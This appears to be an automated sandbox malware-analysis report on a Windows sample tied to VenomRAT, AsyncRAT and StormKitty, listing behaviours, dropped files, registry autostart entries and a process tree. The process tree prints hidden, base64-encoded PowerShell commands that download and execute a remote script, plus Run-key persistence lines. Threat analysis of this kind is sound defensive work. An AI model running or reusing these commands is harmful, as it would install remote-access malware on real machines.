Analysis Overview
SHA256
fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
Threat Level: Known bad
The file fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c was found to be: Known bad.
Malicious Activity Summary
Venomrat family
VenomRAT
AsyncRat
Asyncrat family
StormKitty
Stormkitty family
StormKitty payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-17 15:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-17 15:25
Reported
2024-11-17 15:28
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
149s
Command Line
Signatures
AsyncRat
Asyncrat family
StormKitty
StormKitty payload
Stormkitty family
VenomRAT
Venomrat family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Edgeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Edgeservices\" \"C:\\Users\\Public\\Downloads\\Edgeservices\\Edgeservices.exe\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Chromeservices\" \"C:\\Users\\Public\\Downloads\\Chromeservices\\Chromeservices.exe\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1324 set thread context of 2480 | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
| PID 380 set thread context of 1640 | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe | "C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe" |
| C:\Windows\SYSTEM32\cmd.exe | cmd /c sora.bat |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA= |
| C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | "C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" |
| C:\Windows\SYSTEM32\cmd.exe | cmd /c sorast.bat |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwBzAHQALgB0AHgAdAAnACkA |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2480 -ip 2480 |
| C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1316 |
| C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | "C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe" |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" |
Network
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vusuap0l.q1s.ps1
C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
C:\Users\Public\Downloads\Edgeservices\MSVCP140.dll
C:\Users\Public\Downloads\Edgeservices\vcruntime140.dll
C:\Users\Public\Downloads\Edgeservices\Qt5Core.dll
C:\Users\Public\Downloads\Edgeservices\vcruntime140_1.dll
C:\Users\Public\Downloads\Edgeservices\concrt140e.dll
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Public\Downloads\Chromeservices\Qt5Core.dll
C:\Users\Public\Downloads\Chromeservices\concrt140e.dll